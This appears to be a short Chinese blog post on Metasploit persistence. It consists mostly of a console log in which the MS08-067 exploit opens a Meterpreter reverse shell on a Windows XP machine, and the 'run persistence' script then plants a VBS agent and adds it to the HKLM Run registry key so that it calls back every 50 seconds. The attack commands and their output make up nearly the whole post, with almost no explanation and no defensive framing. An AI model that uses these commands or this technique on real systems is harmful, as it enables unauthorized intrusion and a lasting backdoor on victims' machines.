metasploit控制持久化

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.11:4444 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.142:1071) at 2013-04-27 19:35:42 -0400

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.142
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-9743DD32E3_20130427.3635/ROOT-9743DD32E3_20130427.3635.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.142 LPORT=443
[*] Persistent agent script is 612411 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\CmABaQMMkKnlD.vbs
[*] Executing script C:\WINDOWS\TEMP\CmABaQMMkKnlD.vbs
[+] Agent executed with PID 456
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dbmgcLdVJ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dbmgcLdVJ
meterpreter > 


持久化后,XP每隔50秒左右,出现如下:



  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值